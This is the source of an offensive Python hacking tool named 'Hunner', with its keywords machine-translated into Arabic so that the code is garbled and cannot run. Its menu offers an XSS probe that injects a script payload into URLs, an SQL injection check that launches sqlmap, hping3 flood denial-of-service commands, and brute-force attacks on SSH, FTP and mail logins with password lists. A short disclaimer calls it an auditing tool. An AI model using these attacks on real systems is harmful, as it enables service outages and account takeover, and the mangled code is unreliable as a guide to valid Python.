# إنشاء python3 
# مؤلف B3avers
# 
استيراد  urllib . طلب   كـ  urllib2 
استيراد  إعادة
استيراد  تميز الكلية ، السراج
استيراد  عشوائي

H  =  ' \ 033 [95 م'
B  =  ' \ 033 [94 م'
G  =  ' \ 033 [92 م'
W  =  ' \ 033 [93 مترًا]
F  =  ' \ 033 [91 م'
E  =  ' \ 033 [0 م'
U  =  ' \ 033 [4 م'
O  =  ' \ 033 [33 م'
 
 معلومات def ():
	الإصدار  =  B + '1.0' + E
	المؤلف  =   B + 'B3-v3r' + E
	طباعة ( "" "
		#################################
		# # 
		# الإصدار->٪ s #
		# #
		# مؤلف->٪ s # 
		# #
		#################################
		"" "  ٪ ( VERSION ، AUTHOR ))
 رؤساء def ():
	 الرأس العالمي
	الرأس  =  E + H + "" "
"" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "" "
"" "" "¶¶" "" "" " + W + " إطار عمل هنر " + E + H + " "" "" "" "
"" "" ¶ "" "" "" + F + "إنشاء B3-v3r" + H + "" "" "" "" " ¶
"" "" "" "" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "" "" "" "
"" "" ¶ "" "" "" " + B + " الإصدار 1.0 " + H + " "" "" "" "" " ¶
"" "" "" "" "" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" "" ""
"" "" "¶" "" "" "" "" "
"" "" ¶¶ "" " + F + " Hunner " + H + " "¶¶¶" "¶¶¶" " + F + " Hunner " + H + "" "¶¶¶
"" "" "" "" "" "" ""
"" "" "" "" "" "" "" "" "" "" ""
"" "¶¶" "" "" "" "" "" "" "" ""
"" ¶¶ "" "" "" "" "" "" "" "" ""
"" ¶¶ "" "" "" "" "" "" "" "" "" " ¶
"" ¶ "" "" "" "" "" "" "" "" "" "" "" "" ""
"" ¶¶ "" "" "" "" "" "" "" "" "" "" "
"" ¶¶¶ "" "" "" "" "" "" "" ""
"" "" "" ¶¶¶¶¶ "" "" "
"" "" "" "¶¶¶" "¶¶¶" " + W + " " + H + " "¶¶" "" ¶
"" "" "" "" ¶¶¶ "" " + W + " القرصنة " + H + " "" "¶¶¶
"" "" "" "" "" "" ""
"" "" "" "" "" "" "" "
"" "" "" "" "" "" "" "" "" "" ""
"" "" "" "" "" "" "" "" "" "" "
	"" " + هـ
 بانر def ():
	text1  =  B + "" "
 ___                                                             
()                                                            
| | .-. ___ ___ ___ .-. ___ .-. .--. ___ .-.    
| | / \ () () () \ () \ / \ () \   
| .-. . | | | | | .-. . | .-. . | .-. ؛ | '.-. ؛  
| | | | | | | | | | | | | | | | | | | | | / (___)
| | | | | | | | | | | | | | | | | "_." | |        
| | | | | | ؛ '| | | | | | | | | .'.-. | |        
| | | | "" - / / | | | | | | | "" - / / |   
(___) (___) ".__." (___) (___) (___) (___) `.__. ' (___)
       "" " + F + " <<<< -------- " + W + " الإطار القرصنة " + F + '-------- >>>>" + E
	text2  =  O + "" "
 _ _                             
| | | |                            
| | _ | | _ _ _ __ _ __ ___ _ __
| _ | | | | '_ \ | '_ \ / _ \' __ |
| | | | | _ | | | | | | | | __ / |   
\ _ | | _ / \ __ ، _ | _ | | _ | _ | | _ | \ ___ | _ |   
      "" " + F + '<<<< ---------' + W + 'B3-v3r' + F + '--------- >>>>' + E + F + ' \ ن <<<< -------- " + W + " الإطار القرصنة " + F + ' -------- >>>>" + E
	text3  =  F + "" "
	 ____ ____                                          
	| _ || _ |                                         
  	  | | __ | | __ _ _ .--. _ .--. .---. _ .--.  
  	  | __ | [| | | [`.-. | [`.-. | / / __ \\ [`/ '' \]
	 _ | | | | _ | \ _ / |، | | | | | | | || \ __.، | |     
	| ____ || ____ | '.__.'_ / [___ || __] [___ || __]' .__. '[___]    
                                             
	"" " + B + 'Version =' + W + '1.0' + E
	ركض  =  عشوائي . randrange ( 1 ، 4 )
	إذا  ركض  ==  1 :
		طباعة ( text1 )
	 ركض  أليف ==  2 :
		طباعة ( text2 )
	 ركض  أليف ==  3 :
		طباعة ( text3 )

def  XXS ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	طباعة ( "أدخل الموقع:" )
	حاول :
		site  =  الإدخال ( B + 'Hunner »XXS»' + E )
	باستثناء :
		طباعة ( F + ' \ n Error' + E )
		
	إذا  "HTTP: //"  ليس  في  موقع  و  "HTTPS: //" ليس  في  الموقع :
		site  =  'http: //'  +  site
	آخر :
		البشري

	إذا  "معرف ="  لا  في  الموقع :
		طباعة ( F + '[!]' + E + 'الموقع لا يتضمن معلمات معرف' )
	آخر :
		طباعة ( W + '[*]' + G + 'Site' + site + 'have' id "param ' )
	
	حاول :
		الدقة  =  urllib2 . urlopen ( موقع )
	باستثناء :
		طباعة ( F + '[!] الموقع لا يعمل' + E )
		خروج ()
	
	حاول :
		طباعة ( W + "[+]" + G + "عمل الموقع" + E )
		scr  =  '؛ <script> تنبيه (111111111111111111111) ؛ </script>'
		site_xxs  =  موقع + scr
		الدقة  =  urllib2 . urlopen ( site_xxs )
		info  =  res . معلومات ()
		طباعة ( '################ Info ################ \ n ' )
		طباعة ( معلومات )
		طباعة ( '#################################### \ n ' )
		نص  =  الدقة . قراءة ()

		إذا كان  "111111111111111111111"  ليس  في  str ( text ):
			طباعة ( F + '[!]' + 'الموقع ليس به XXs' + E )
			خروج ()
		آخر :
			طباعة ( U + W + "[++]" + B + "موقع" + موقع  + "نقاط ضعف xxs" + E )
			طباعة ( W + 'Payload:' + G + site_xxs + E )
			SYS . مخرج ( 1 )

	باستثناء :
		طباعة ( F + '[!]' + 'خطأ فادح' + E )
		خروج ()
def  desc ():
	طباعة ( F + ""
    تم إنشاء هذا البرنامج للمراجعة وليس لإحداث ضرر.
    استخدام الصياد لمهاجمة الأهداف دون موافقة متبادلة مسبقة غير قانوني.
    لا يتحمل المطورون أي مسؤولية وليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
    '' + E )

def  SQL ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	طباعة ( G + 'Enter site:' + E )
	site  =  الإدخال ( B + 'Hunner »SqlScaner»' + E )
	إذا  "HTTP: //"  ليس  في  موقع  و  "HTTPS: //" ليس  في  الموقع :
		site  =  'http: //'  +  site
	آخر :
		البشري
	إذا  "معرف ="  لا  في  الموقع :
		طباعة ( F + '[!]' + E + 'الموقع لا يتضمن معلمات معرف' )
	آخر :
		طباعة ( W + '[*]' + G + 'Site' + site + 'have' id "param ' )
	حاول :
		الدقة  =  urllib2 . urlopen ( موقع )
		طباعة ( W + "[+]" + G + "عمل الموقع" + E )
	باستثناء :
		طباعة ( F + '[!]' + E + 'Site dont work' )
	حاول :
		info  =  res . معلومات ()
		طباعة ( '##################### Info #####################' )
		طباعة ( معلومات )
		طباعة ( "##############################################" )
		bad_site  =  site + ' \' \ " "
		الدقة  =  urllib2 . urlopen ( bad_site )
		نص  =  الدقة . قراءة ()
		إذا كان  "لديك خطأ في بناء جملة SQL"  ليس  في  str ( text ):
			طباعة ( W + "[-]" + F + "الموقع" + الموقع + "عدم وجود خطأ Sql" + E )
		آخر :
			طباعة ( W + '[++]' + H + 'Site' + F + site + H + 'خطأ SQL' + E )
			طباعة ( "هل تريد بدء sqlmap؟" )
			y  =  الإدخال ( "Y / n->" )
			إذا كانت  y  ==  "Y"  أو  y  ==  'y' :
				نظام التشغيل . النظام ( 'sqlmap -u' + site + '--dbs' )
			آخر :
				طباعة ( W + '<< Good by >>' + E )
	باستثناء :
		طباعة ( F + "خطأ فادح" + E )


ديف  دوس ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	طباعة ( "أدخل الموقع:" )
	site  =  الإدخال ( B + 'Hunner »Dos»' + E )
	اطبع ( '' أدخل المستوى:
		1) جرعة عالية
		2) منفذ دوس
 		3) جرعات منخفضة "" )
	level  =  int ( الإدخال ( B + 'Hunner »Dos» Level »' + E ))
	إذا كان  المستوى  ==  1 :
		نظام التشغيل . النظام ( "hping3 -S -P --flood -V ' + site )
	إذا كان  المستوى  ==  2 :
		port  =  المدخلات ( B + 'Hunner »Dos» المستوى »Port»' + E )
		نظام التشغيل . النظام ( 'hping3 -S -P --flood -V -p' + port + '' +  site )
	إذا كان  المستوى  ==  3 :
		نظام التشغيل . النظام ( 'python3 modules / dos.py' + site )

def  SSH_Brut ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	حاول :
		طباعة ( F + 'Brutforse ssh mode !!' + E )
		طباعة ( "أدخل مضيف الهدف:" )
		host  =  الإدخال ( W + 'Hunner »SSH» Host »' + E )
		طباعة ( G + 'أدخل اسم المستخدم:' + E )
		طباعة ( G + "افتراضي: admin" + E )
		user  =  الإدخال ( W + 'Hunner »SSH» المستخدم »' E + )
		إذا كان  المستخدم  ==  "" :
			user  =  "admin"
		طباعة ( G + 'Enter file password:' + E )
		كلمة المرور  =  الإدخال ( W + 'Hunner »SSH» كلمة المرور »' E + )

		إذا  كلمة المرور  ==  "" :
			طباعة ( "أدخل ملف كلمة المرور" )
			SYS . مخرج ( 1 )
		نظام التشغيل . النظام ( 'python3 modules / ssh.py' + host + '' + user + '' + password )
	باستثناء :
		طباعة ( F + "إحباط المستخدم !!" )
		خروج ()


def  FTP_Brut ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	طباعة ( F + 'Brutforse ftp mode !!' + E )
	طباعة ( B + 'Enter host:' + E )
	host  =  الإدخال ( W + 'Hunner »Ftp» Host »' + E )
	طباعة ( B + 'Enter user:' + E )
	طباعة ( F + 'افتراضي: admin' )
	user  =  الإدخال ( W + 'Hunner »Ftp» المستخدم »' + E )
	طباعة ( B + 'Enter file password:' + E )
	password_list  =  الإدخال ( W + 'Hunner »Ftp» كلمة المرور »' + E )
	إذا كان  المستخدم  ==  '' :
		user  =  "admin"
	إذا  password_list  ==  '' :
		طباعة ( "أدخل قائمة كلمات المرور" )
		SYS . مخرج ( 1 )
	نظام التشغيل . النظام ( 'python3 modules / ftp.py' + host + '' + user + '' + password_list )


 بريد def ():
	نظام التشغيل . نظام ( 'clear' )
	بانر ()
	طباعة ( H + 'Brut mail account' + E )
	طباعة ( B + 'أدخل تسجيل الدخول:' + E )
	mail  =  input ( W + 'Hunner »Mail» تسجيل الدخول »' E + )
	طباعة ( B + 'أدخل قائمة كلمات المرور:' + E )
	كلمة المرور  =  الإدخال ( W + 'Hunner »Mail» كلمة المرور »' E + )
	إذا  كلمة المرور  ==  '' :
		طباعة ( F + 'قائمة كلمات المرور: password / password_list.txt' + E )
		password  =  "password / password_list.txt"
	نظام التشغيل . النظام ( 'python3 modules / mail.py' + mail + '' + password )

def  Main_Menu ():
	طباعة ( رأس )
	تنازلي ()
	طباعة ( ' \ n ' )
	طباعة ( B + ""
	مواقع القائمة:
  	'' ' + E + ""
  	1) XXS
  	2) Sql
 	3) موقع دوس 
  	"" + W + "" ------------------- "" + E )
	طباعة ( B  +  ""
  	القائمة Brute:
  	'' ' + E + ""
  	4) Brute Ftp
  	5) بروت SSH
  	6) رسائل الغاشمة
  	"" + W + "" ------------------- \ n "" + E )
	حاول :
		v  =  الإدخال ( "Hunner-» " )
	باستثناء :
		طباعة ( "Good by" )
		خروج ()
	
	إذا  v  ==  "مساعدة" :
		معلومات ()
	elif  int ( v ) ==  1 :
		XXS ()
	elif  int ( v ) ==  2 :
		SQL ()
	elif  int ( v ) ==  3 :
		دوس ()
	elif  int ( v ) ==  4 :
		FTP_Brut ()
	elif  int ( v ) ==  5 :
		SSH_Brut ()
	elif  int ( v ) ==  6 :
		البريد ()
	آخر :
		طباعة ( F + '[!]' + 'لقد أدخلت قيمة غير صحيحة' + E )
		خروج ()
رؤساء ()
Main_Menu ()
